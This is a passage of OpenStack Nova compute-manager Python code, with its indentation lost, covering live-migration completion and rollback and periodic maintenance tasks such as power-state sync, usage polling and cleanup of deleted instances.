@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
This method is called from live_migration
and mainly updating database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
LOG.info(_LI('_post_live_migration() is started..'),
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# remove the volume connection without detaching from hypervisor
# because the instance is not running anymore on the current host
if bdm.is_volume:
self.volume_api.terminate_connection(ctxt, bdm.volume_id,
connector)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self._get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
# For all hypervisors other than libvirt, there is a possibility
# they are unplugging networks from source node in the cleanup
# method
destroy_vifs = True
# Define domain at destination host, without doing it,
# pause/suspend/terminate do not work.
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
LOG.info(_LI('Migrating instance to %s finished successfully.'),
dest, instance=instance)
LOG.info(_LI("You may see the error \"libvirt: QEMU error: "
"Domain not found: no domain with matching name.\" "
"This error can be safely ignored."),
instance=instance)
if CONF.vnc_enabled or CONF.spice.enabled or CONF.rdp.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(ctxt,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(ctxt,
instance.uuid)
@object_compat
@wrap_exception()
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
block_migration):
"""Post operations for live migration .
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info(_LI('Post operation of migration started'),
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.post_live_migration_at_destination(context, instance,
network_info,
block_migration, block_device_info)
# Restore instance state
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'), self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, block_migration, migrate_data=None):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest:
This method is called from live migration src host.
This param specifies destination host.
:param block_migration: if true, prepare for block migration
:param migrate_data:
if not none, contains implementation specific data.
"""
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
@object_compat
@wrap_exception()
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks=True,
migrate_data=None):
"""Cleaning up image directory that is created pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
"""
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
If anything errors don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
# Check the instance isn't being deleting
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self._get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except Exception:
LOG.error(_LE('An error occurred while refreshing the network '
'cache.'), instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info(_LI("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds"),
migrations_info)
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning(_LW("Setting migration %(migration_id)s to error: "
"%(reason)s"),
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info(_LI("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s"),
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
# race condition: The instance in DELETING state should not be
# set the migration state to error, otherwise the instance in
# to be deleted which is in RESIZED state
# will not be able to confirm resize
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info(_LI("Error auto-confirming resize: %s. "
"Will retry later."),
e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
filters = {'vm_state': vm_states.SHELVED,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save()
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception(_LE('Periodic task failed to offload instance.'),
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
if compute_utils.has_audit_been_run(context,
self.conductor_api,
self.host):
return
begin, end = utils.last_completed_audit_period()
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info(_LI("Running instance usage audit for"
" host %(host)s from %(begin_time)s to "
"%(end_time)s. %(number_instances)s"
" instances."),
dict(host=self.host,
begin_time=begin,
end_time=end,
number_instances=num_instances))
start_time = time.time()
compute_utils.start_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, num_instances)
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception(_LE('Failed to generate usage '
'audit for instance '
'on host %s'), self.host,
instance=instance)
errors += 1
compute_utils.finish_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, errors,
"Instance usage audit ran "
"for host %s, %s instances "
"in %s seconds." % (
self.host,
num_instances,
time.time() - start_time))
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info(_LI("Updating bandwidth usage cache"))
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that its not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.warning(_LW("Bandwidth usage not supported by "
"hypervisor."))
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
self.conductor_api.vol_usage_update(context, usage['volume'],
usage['rd_req'],
usage['rd_bytes'],
usage['wr_req'],
usage['wr_bytes'],
usage['instance'])
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context, start_time=None):
if CONF.volume_usage_poll_interval == 0:
return
if not start_time:
start_time = utils.last_completed_audit_period()[1]
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we make a DB call to get the number of
virtual machines known by the hypervisor and if the number matches the
number of virtual machines known by the database, we proceed in a lazy
loop, one database record at a time, checking if the hypervisor has the
same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning(_LW("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor."),
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
query_driver_power_state_and_sync()
except Exception:
LOG.exception(_LE("Periodic sync_power_state task had an "
"error while processing an instance."),
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
LOG.debug('Sync already in progress for %s' % uuid)
else:
LOG.debug('Triggering sync for uuid %s' % uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info(_LI("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s"),
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
# that the DB instance already report the new resident
# but the actual VM has not showed up on the hypervisor
# yet. In this case, let's allow the loop to continue
# and run the state sync in a later round
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info(_LI('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.'),
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.SUSPENDED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.SUSPENDED:
LOG.warning(_LW("Instance is suspended unexpectedly. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because the user request via API calls, but also
# due to (temporary) external instrumentations.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning(_LW("Instance is paused unexpectedly. Ignore."),
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning(_LW("Instance is unexpectedly not found. Ignore."),
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a stopped
# instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Paused instance shutdown by itself. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning(_LW("Instance is not (soft-)deleted."),
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
# TODO(comstud, jichenjc): Dummy quota object for now See bug 1296414.
# The only case that the quota might be inconsistent is
# the compute node died between set instance state to SOFT_DELETED
# and quota commit to DB. When compute node starts again
# it will have no idea the reservation is committed or not or even
# expired, since it's a rare case, so marked as todo.
quotas = objects.Quotas.from_reservations(context, None)
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info(_LI('Reclaiming deleted instance'), instance=instance)
try:
self._delete_instance(context, instance, bdms, quotas)
except Exception as e:
LOG.warning(_LW("Periodic reclaim failed to delete "
"instance: %s"),
e, instance=instance)
@periodic_task.periodic_task
def update_available_resource(self, context):
"""See driver.get_available_resource()
Periodic process that keeps that the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
"""
new_resource_tracker_dict = {}
nodenames = set(self.driver.get_available_nodes())
for nodename in nodenames:
rt = self._get_resource_tracker(nodename)
rt.update_available_resource(context)
new_resource_tracker_dict[nodename] = rt
# Delete orphan compute node not reported by driver but still in db
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True)
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info(_LI("Deleting orphan compute node %s") % cn.id)
cn.destroy()
self._resource_tracker_dict = new_resource_tracker_dict
def _get_compute_nodes_in_db(self, context, use_slave=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
LOG.error(_LE("No compute node record for host %s"), self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning(_LW("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info(_LI("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.warning(_LW("set_bootable is not implemented "
"for the current driver"))
# and power it off
self.driver.power_off(instance)
except Exception:
msg = _LW("Failed to power off instance")
LOG.warn(msg, instance=instance, exc_info=True)
elif action == 'reap':
LOG.info(_LI("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception as e:
LOG.warning(_LW("Periodic cleanup failed to delete "
"instance: %s"),
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False,
'host': self.host}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
deleted_at = instance['deleted_at']
if isinstance(instance, obj_base.NovaObject) and deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
quotas=None,
instance_state=vm_states.ACTIVE):
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to %(state)s after: "
"%(error)s"),
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to ACTIVE after: %s"),
error, instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
self._set_instance_error_state(context, instance)
@aggregate_object_compat
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
